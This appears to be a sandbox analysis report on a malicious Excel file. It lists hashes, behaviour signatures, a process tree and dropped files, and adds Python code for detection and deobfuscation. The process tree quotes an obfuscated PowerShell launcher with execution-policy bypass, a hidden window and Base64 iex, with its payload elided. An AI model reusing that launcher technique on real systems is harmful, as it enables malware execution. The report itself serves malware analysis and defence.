Analysis

  • max time kernel
    139s
  • max time network
    140s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64
    arch:x86
    image:win7-20240903-en
    locale:en-us
    os:windows7-x64
    system
  • submitted
    13-11-2024 02:46

General

  • Target

    aa4a4d125c444cbe602ab60cba31083a31fd60e2c2ce08e55f84468751a82daf.xls

  • Size

    1.1MB

  • MD5

    8f3c11affc3d0195c96e4d1e4478e29c

  • SHA1

    daad41a948964394469ac56db60e102515fe938f

  • SHA256

    aa4a4d125c444cbe602ab60cba31083a31fd60e2c2ce08e55f84468751a82daf

  • SHA512

    194efa4322ad42523eb4a8bfca941388eb645dde024712cbef2bd106d88407ff6f67ad3e6ddfdc8cbe7e7ba98a3fc6928092920c62d2b326e1bbb3b9784d0fa2

  • SSDEEP

    24576:Uq9PLiijE2Z5Z2am8VcYjgxPF84LJQodsJU1BnBsk7LRXA2r:UEPLiij7Z5ZK8VcYMpFjLJQodH1BXPR9

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro; in this run EXCEL.EXE (PID 3048) spawned mstsc.exe (PID 2360).

  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempts to gather information about the system language of the victim host in order to infer its geographical location.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs
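The "Process spawned unexpected child process" signature and the rest of the chain in the Processes section below (Excel spawning mstsc.exe, a COM-activated mshta.exe spawning PowerShell, PowerShell driving csc.exe and launching wlanext.exe from AppData\Roaming, and a svchost.exe whose recorded command line names wlanext.exe) are all parent/child or image/command-line relationships that process-creation telemetry alone can surface. The following is an added example, not the report's or the sandbox's code: the event records are constructed from the process tree on this page, and the field names and rule set are assumptions (a production rule set needs allowlists such as splwow64.exe under Office, omitted here).

```python
"""Parent/child anomaly checks over process-creation records.

Added example for this report, not code from the sandbox. EVENTS is constructed
from the report's process tree (image path, command line, PID, parent PID); the
field names and the rule set are assumptions, not the sandbox's own logic.
"""
import ntpath
import re

X = r"C:\Users\Admin\AppData\Local\Temp\aa4a4d125c444cbe602ab60cba31083a31fd60e2c2ce08e55f84468751a82daf.xls"
EVENTS = [  # ppid 0 = parent not recorded in the tree
    {"pid": 3048, "ppid": 0,
     "image": r"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE",
     "cmdline": r'"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde ' + X},
    {"pid": 2360, "ppid": 3048, "image": r"C:\Windows\SysWOW64\mstsc.exe",
     "cmdline": r'"C:\Windows\SysWOW64\mstsc.exe"'},
    {"pid": 2732, "ppid": 0, "image": r"C:\Windows\SysWOW64\mshta.exe",
     "cmdline": r"C:\Windows\SysWOW64\mshta.exe -Embedding"},
    {"pid": 2476, "ppid": 2732,
     "image": r"C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE",
     "cmdline": r'"C:\Windows\SysTEM32\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE" '
                r'"pOwErsHell -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt ; iex(...)"'},  # payload elided
    {"pid": 876, "ppid": 2476,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt'},
    {"pid": 768, "ppid": 2476,
     "image": r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tnpx6mte.cmdline"'},
    {"pid": 1992, "ppid": 768,
     "image": r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe",
     "cmdline": r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86"},
    {"pid": 1976, "ppid": 2476, "image": r"C:\Users\Admin\AppData\Roaming\wlanext.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Roaming\wlanext.exe"'},
    {"pid": 2124, "ppid": 1976, "image": r"C:\Windows\SysWOW64\svchost.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Roaming\wlanext.exe"'},  # hollowed: image != cmdline
]

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
COMPILERS = {"csc.exe", "vbc.exe"}
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\appdata\\", re.I)


def basename(path):
    return ntpath.basename(path).lower()


def first_token(cmdline):
    """Executable path a command line begins with, quoted or bare."""
    m = re.match(r'\s*"([^"]+)"|\s*(\S+)', cmdline)
    return (m.group(1) or m.group(2)) if m else ""


def detect(events):
    """Return (pid, rule, detail) findings over a list of process records."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        child = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        pname = basename(parent["image"]) if parent else ""
        if pname in OFFICE and child not in OFFICE:
            findings.append((e["pid"], "office_spawn", f"{pname} -> {child}"))
        if pname == "mshta.exe" and child in SCRIPT_HOSTS:
            findings.append((e["pid"], "mshta_spawn", f"{pname} -> {child}"))
        if pname == "powershell.exe" and child in COMPILERS:
            findings.append((e["pid"], "runtime_compile", f"{pname} -> {child}"))
        # -Embedding is the switch COM passes to a local server it activates, so
        # an mshta.exe started this way has no script-host parent to correlate on.
        if child == "mshta.exe" and "-embedding" in e["cmdline"].lower():
            findings.append((e["pid"], "com_activated_script_host", e["cmdline"]))
        # Image path and command line disagree: the usual trace of a suspended
        # system binary whose memory was replaced before it ran (hollowing).
        claimed = basename(first_token(e["cmdline"]))
        if claimed and claimed != child:
            findings.append((e["pid"], "image_cmdline_mismatch", f"image={child} cmdline={claimed}"))
        if child.endswith(".exe") and USER_WRITABLE.search(e["image"]):
            findings.append((e["pid"], "exec_from_appdata", e["image"]))
    return findings


if __name__ == "__main__":
    for pid, rule, detail in detect(EVENTS):
        print(f"PID {pid:<5} {rule:<26} {detail}")
```

Run against the constructed records, this flags six processes and stays quiet on EXCEL.EXE itself, the second PowerShell (PID 876) and cvtres.exe (PID 1992). The image/command-line mismatch rule is the one worth keeping even when everything else is tuned away: a process whose image is svchost.exe but whose command line is a path under AppData\Roaming has no benign explanation.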

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\aa4a4d125c444cbe602ab60cba31083a31fd60e2c2ce08e55f84468751a82daf.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3048
    • C:\Windows\SysWOW64\mstsc.exe
      "C:\Windows\SysWOW64\mstsc.exe"
      2⤵
      • Process spawned unexpected child process
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:2360
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2732
    • C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE
      "C:\Windows\SysTEM32\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE" "pOwErsHell -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt ; iex($(Iex('[sYStEM.tExt.EnCodINg]'+[ChaR]58+[CHAr]0X3a+'UTF8.getsTring([SYsTEm.CoNVErT]'+[ChAr]0x3a+[CHAR]58+'FroMBASe64strINg('+[ChaR]0X22+'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'+[chaR]0X22+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • Loads dropped DLL
      • Drops file in System32 directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2476
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt
        3⤵
        • Evasion via Device Credential Deployment
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:876
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tnpx6mte.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:768
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC16C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC16B.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1992
      • C:\Users\Admin\AppData\Roaming\wlanext.exe
        "C:\Users\Admin\AppData\Roaming\wlanext.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:1976
        • C:\Windows\SysWOW64\svchost.exe
          "C:\Users\Admin\AppData\Roaming\wlanext.exe"
          4⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          PID:2124
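The PowerShell command line recorded for PID 2476 is a two-stage launcher. The inner Iex assembles the literal `[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("..."))` from single-quoted fragments joined with `[char]` casts (58 and 0x3a for the two colons of `::`, 0x22 for the double quotes around the Base64 blob), and the outer iex runs whatever that decodes to. PowerShell resolves unambiguous parameter prefixes, so `-Ex ByPass -NoP -w 1 -C` is `-ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command`. The following added example is not from the report or the sandbox: because the real Base64 payload is not reproduced on this page, it rebuilds the same obfuscation around a constructed, harmless stage-2 string, then reverses it in three steps (switch expansion, `[char]`/concatenation folding, Base64 decoding with the UTF-8 codec the script itself names). The switch table is a subset of powershell.exe's parameters, an assumption sufficient for this command line.

```python
"""Normalising an obfuscated PowerShell launcher of the kind seen in this report.

Added example, not the report's or the sandbox's code. STAGE2 and the command
line built from it are constructed stand-ins; the real payload is not on the page.
"""
import base64
import re

# Constructed harmless stage-2 script standing in for the real payload.
STAGE2 = "Write-Output 'constructed stage-2 placeholder'"
_B64 = base64.b64encode(STAGE2.encode("utf-8")).decode("ascii")

# Same shape as the recorded command line: [char]58 / [char]0x3a build "::",
# [char]0x22 builds the double quotes around the Base64 blob.
SAMPLE = (
    "pOwErsHell -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt ; "
    "iex($(Iex('[sYStEM.tExt.EnCodINg]'+[ChaR]58+[CHAr]0X3a+'UTF8.getsTring([SYsTEm.CoNVErT]'"
    "+[ChAr]0x3a+[CHAR]58+'FroMBASe64strINg('+[ChaR]0X22+'" + _B64 + "'+[chaR]0X22+'))')))"
)

# Subset of powershell.exe parameters (True = takes a value). PowerShell accepts
# any unambiguous prefix, which is what -Ex / -NoP / -w / -C rely on.
SWITCHES = {"ExecutionPolicy": True, "NoProfile": False, "WindowStyle": True,
            "Command": True, "NonInteractive": False, "NoLogo": False,
            "NoExit": False, "EncodedCommand": True}
WINDOW_STYLE = {"0": "Normal", "1": "Hidden", "2": "Minimized", "3": "Maximized"}
CHAR_TOKEN = re.compile(r"\[char\]\s*(0x[0-9a-f]+|\d+)", re.I)
B64_CALL = re.compile(r'FromBase64String\("([A-Za-z0-9+/=]+)"\)', re.I)


def expand_switches(cmd):
    """Resolve abbreviated switches to full names; -Command swallows the rest."""
    toks = cmd.split()
    i = 1 if toks and not toks[0].startswith("-") else 0   # skip the exe name
    out = {}
    while i < len(toks) and toks[i].startswith("-"):
        prefix = toks[i][1:].lower()
        names = [n for n in SWITCHES if n.lower().startswith(prefix)]
        if len(names) != 1:
            raise ValueError(f"unknown or ambiguous switch {toks[i]}")
        name = names[0]
        if name == "Command":
            out[name] = " ".join(toks[i + 1:])
            break
        if SWITCHES[name]:
            out[name] = toks[i + 1]
            i += 2
        else:
            out[name] = True
            i += 1
    return out


def inner_iex_arg(cmd):
    """Text inside the innermost iex( ... ). Parentheses inside single-quoted
    literals are skipped; Base64 never contains a quote, so this is safe here."""
    start = [m.end() for m in re.finditer(r"\biex\s*\(", cmd, re.I)][-1]
    depth, i = 1, start
    while depth:
        c = cmd[i]
        if c == "'":
            i = cmd.index("'", i + 1)
        elif c == "(":
            depth += 1
        elif c == ")":
            depth -= 1
        i += 1
    return cmd[start:i - 1]


def fold_concat(expr):
    """Evaluate '+'-joined single-quoted literals and [char]N casts to one string."""
    out, i = [], 0
    while i < len(expr):
        c = expr[i]
        if c == "'":
            j = expr.index("'", i + 1)
            out.append(expr[i + 1:j])
            i = j + 1
        elif c == "[":
            m = CHAR_TOKEN.match(expr, i)
            if not m:
                raise ValueError(f"unsupported token at offset {i}: {expr[i:i + 12]!r}")
            out.append(chr(int(m.group(1), 0)))   # int(..., 0) handles 58 and 0x3a
            i = m.end()
        elif c in "+ \t":
            i += 1
        else:
            raise ValueError(f"unexpected character {c!r} at offset {i}")
    return "".join(out)


def deobfuscate(cmd):
    """Expanded switches, the folded stage-1 expression and the decoded stage-2."""
    sw = expand_switches(cmd)
    if "WindowStyle" in sw:
        sw["WindowStyle"] = WINDOW_STYLE.get(sw["WindowStyle"], sw["WindowStyle"])
    stage1 = fold_concat(inner_iex_arg(cmd))
    m = B64_CALL.search(stage1)
    # The script names UTF8.GetString, so decode as UTF-8; an -EncodedCommand
    # blob would be UTF-16LE instead, and decoding it as UTF-8 silently garbles it.
    stage2 = base64.b64decode(m.group(1)).decode("utf-8") if m else None
    return {"switches": sw, "stage1": stage1, "stage2": stage2}


if __name__ == "__main__":
    for key, value in deobfuscate(SAMPLE).items():
        print(f"{key}: {value}")
```

The folding step is deliberately a scanner rather than a `split('+')`: Base64 text can itself contain `+`, and the quoted fragments contain parentheses, so both the argument extraction and the concatenation have to respect single-quoted literals. The recovered stage-1 string is what the sandbox's second PowerShell process (PID 876) would have executed, and the decoded stage-2 text is where the actual download and drop logic lives.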

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

    Filesize

    717B

    MD5

    822467b728b7a66b081c91795373789a

    SHA1

    d8f2f02e1eef62485a9feffd59ce837511749865

    SHA256

    af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

    SHA512

    bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CB467543952BE6B5200B9CADEB942CD1

    Filesize

    504B

    MD5

    fca2d4075e78fd8330d5590ee560451b

    SHA1

    b7ab976b0f45facd4a29a6aded52515523cd756b

    SHA256

    9f9f330b74a23eac5552db138565085b9a57c32dc746c3ad230659ad37ddc689

    SHA512

    f0adf4b6d64229f3c8dee585a80a7e8e1614251318be226bbf5af21779bf7ffac0d9f9858525e5388f00b9547984dae737d022d0cce4ba4c66936383bf55f991

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

    Filesize

    192B

    MD5

    8cea8ad0055cfa7e2996bb974d07439d

    SHA1

    0f79068cf7f28aa67c12849457f6b73eb319125a

    SHA256

    975a4049d9052d356d7e8b98a12d146bb9f006e76df36ba7dbe4d265078e191a

    SHA512

    68dbc1e3cad1c472490000cbe5c9f0f5fb053ca0ed50fad15fc91144c5f4cddc2b8bf0df1db4802d13f45be366065de08b26784e3ff32bb1a5980be4db34f87a

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CB467543952BE6B5200B9CADEB942CD1

    Filesize

    554B

    MD5

    278f2c9dc15ca7c48785ffb7a522f3b6

    SHA1

    826e17b66ae225807c37f1534623ee2120cf3666

    SHA256

    67a45783638fa4692d0d52305b3e2d4dd64dfddce09b049d64c8942b9a561661

    SHA512

    4c3f6e4f8d0c788b608fc73163c669e2b894ea9068fc01ba21187eeb924f2d203280250b5ca55d665c9e44a3806d952e3b375e7414a747423b40c484e5234ecb

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K3VL8XEP\seethebestthingswithgreatthingsbestthingswithgreatentry[1].hta

    Filesize

    8KB

    MD5

    03ebca3f0b4171e32b0689a3410e79ad

    SHA1

    1e7b517e45f1b0e503e796bb6dcc7a6252f35364

    SHA256

    1d3307d98ef8b5e0743dc753388a3b8698a52783338bf8fe49042ad62ad98732

    SHA512

    a7b84ce6572f3e820cffe438c771b5c3bdd140fca78edb7d6a7217bb7bf57950168d025f5c6e634e482a4a99576367ada72e3d9e26891ab03901136f9ed74270

  • C:\Users\Admin\AppData\Local\Temp\CabB210.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\RESC16C.tmp

    Filesize

    1KB

    MD5

    ceff02079ffeba9fe9071e2a8dc5c60b

    SHA1

    8ef32fde3068d74ff260594f4e81a9e722dd9c8a

    SHA256

    f2701121bba43e22f733ad8d9c0bc503b547f21fc95d352ca10d0819f7a32d0d

    SHA512

    8e0bcc1700b9ba4ec01d04baed103bb8c5a573b3aa2382eb4ef3ce0b194312314971542ec7399fe2a767da070ac0e3d8002f11c6bda0d3b7724c5d8823ee4f74

  • C:\Users\Admin\AppData\Local\Temp\juvenilely

    Filesize

    283KB

    MD5

    5fc0e7bec89d9a4e021d88dd1cf731b2

    SHA1

    26ea02938cb1eb51a1ac601ab1b068a130cc3719

    SHA256

    532d407f3bdbd28145b385a4e15c80117e07e89f2ba16f1f620fe20cf213783d

    SHA512

    1c54091984fb41f43dbf7c7676184482ca853fb33e41780a323aec0ca21759e2a91af3bff30a947579811882d1c710a138e7e57dea2d9790e5092e68b768664f

  • C:\Users\Admin\AppData\Local\Temp\lxzluzp.zip

    Filesize

    484KB

    MD5

    3bcbd3b08e4a8843fda34512623960a2

    SHA1

    244d3df69bbc09a43d4af3de5165f50506b8d7af

    SHA256

    7db638aa6b205aadba193dc7803a7e73eb07bbeeacbacad3a65978093e78673c

    SHA512

    914f366aab61ed2c13a87ee07e6a4b7aeffe4689c28014fab786244127852a19b7c1ae58bd8dd11840415035290373922f39b628c2409f68569cbf0b8a57e639

  • C:\Users\Admin\AppData\Local\Temp\tnpx6mte.dll

    Filesize

    3KB

    MD5

    1a216f7b4404a7e76e9224ad3f4d0579

    SHA1

    97954f49e9a8c8b54c1542a8f916972443e5b389

    SHA256

    e257a1620aa98b569bcdb75cedbf2552f3d0a3e49df71007dc2a64526d15bb02

    SHA512

    45c7dc8ebd845f46931019b378a8a8333238adf77e73ad3c71be4843a11b6cdad56718d31adb08b6e1ac52f46966ab15c4664f281978238812a8a35fc3ff40a4

  • C:\Users\Admin\AppData\Local\Temp\tnpx6mte.pdb

    Filesize

    7KB

    MD5

    7b95801062f5d47de9cc5e59dcc10462

    SHA1

    6d7e58750a67f796d6441a84538f32b0d481a95e

    SHA256

    1108177b5dac0f3dbb5fef753d33ff281e4a8015184b8962005c2f67eb12f009

    SHA512

    e6253dfef719f52fc44e88d2c26bccd168d1bc7aef5266cd7a39b9ccf67df83c7483f53b066fe1cf1715f4af70c9e51f9b3d76ed5b451854e891a02cf587375d

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    c25ae41143a3dc8db0136cd00b75e178

    SHA1

    c0c8d88e62eb1b3e759677512ed50a320df32479

    SHA256

    73d82479177fd2cf7b7c493b7120035eeb3f17e3eba5973ee427194cd201c754

    SHA512

    3d5e96b136faaab56f24f9fc216f30d418915169600e9a90ab934804f2f2ff8939e490f3098be3141fcde8b0ff151c6179c9ce7160b57f8e1c77e9b32d2ec8fe

  • C:\Users\Admin\AppData\Roaming\wlanext.exe

    Filesize

    946KB

    MD5

    7423e3013a2ca93513e9f1024dfe1cc8

    SHA1

    525281537f75c168ca4015df438bb83a7784931a

    SHA256

    8e3951372f996dd248695a54af7ff1a5cde1059689aa43d953712e6c0744c0df

    SHA512

    d5189a52b0cb9db2da33b7d8a61278e5e8edf0d1f075695dc5e99178e47b319658f8cf3e8339ee8bf24c548b3a38c01265250edf173f368dbea062ada78baea0

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCC16B.tmp

    Filesize

    652B

    MD5

    5c851f4b3a74dc8112c0363e7a4c058b

    SHA1

    9efc91ddaf92b054bc744fce8fa49abb8487d06e

    SHA256

    c1f74a6fbb7152496a27ecb896ecc310c624f4672024766f3b7b6bac32957fab

    SHA512

    c5f9f6313edf4ef0055a0dd39191a0a70c4f9f51f2b6a7667a4a30e759d65f31a8817492ee53863e93f9750386db9cc399fefc55e5a2a53be15cdd0691cf2e4d

  • \??\c:\Users\Admin\AppData\Local\Temp\tnpx6mte.0.cs

    Filesize

    473B

    MD5

    4af98cbe7b888e1e92e1aa8a35732223

    SHA1

    75d54c91355c97fc9b1c3453efea5dccd817ed42

    SHA256

    596b94a3cb934e9261ddf50733d26c0147c5cb57e1215cabed32fee719782f34

    SHA512

    1127001fd6eb53db939188df14cdd466f44103d8386e51ffaeaaa56569e137367388097c37422fbe332f6b7ced9f4959058f1235f106efcc03e492e009705ff3

  • \??\c:\Users\Admin\AppData\Local\Temp\tnpx6mte.cmdline

    Filesize

    309B

    MD5

    cb25a753d2162468e70eb450ff86d8ed

    SHA1

    994be0e177cc763e04068fffea58d20e30dd327f

    SHA256

    52dafc3b411fc1f3f717745ef1c76029cae193d7fb6777f4c67cef223824fdd2

    SHA512

    b396add7928624ee470ed5fd66197222a0192a732054bdac5b0690587e2272e209e3ee91c57b26649527b158940c4538d63c494d7a2457f8bf1508fc9d0216cb

  • \Users\Admin\AppData\Local\Temp\sqlite3.dll

    Filesize

    922KB

    MD5

    dda1b03a5cd2ca37c96b7daf5e3a8ed7

    SHA1

    c70e5f58e61980d39608f0795879bf012dbbbca2

    SHA256

    79f86c1edbbc69652a03a0f5667b3985bcf1e19f16fa3b8c7934e5b97ab8586d

    SHA512

    bf83648c9b5d6d65b2c8409d262a1b7421d2cb13d6c759ec5f352c2d1c5adff3ee2395250fbdfe3590f25fe96bf6b40c2d82a8e7eecaab03be2e6a398e83981f

  • memory/2124-79-0x0000000000400000-0x0000000000447000-memory.dmp

    Filesize

    284KB

  • memory/2360-81-0x0000000000080000-0x00000000000C4000-memory.dmp

    Filesize

    272KB

  • memory/2360-80-0x0000000000080000-0x00000000000C4000-memory.dmp

    Filesize

    272KB

  • memory/2360-119-0x0000000000080000-0x00000000000C4000-memory.dmp

    Filesize

    272KB

  • memory/2360-120-0x0000000061E00000-0x0000000061ED2000-memory.dmp

    Filesize

    840KB

  • memory/2732-16-0x0000000002100000-0x0000000002102000-memory.dmp

    Filesize

    8KB

  • memory/3048-56-0x000000007259D000-0x00000000725A8000-memory.dmp

    Filesize

    44KB

  • memory/3048-1-0x000000007259D000-0x00000000725A8000-memory.dmp

    Filesize

    44KB

  • memory/3048-82-0x0000000007550000-0x0000000007679000-memory.dmp

    Filesize

    1.2MB

  • memory/3048-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/3048-17-0x0000000002D30000-0x0000000002D32000-memory.dmp

    Filesize

    8KB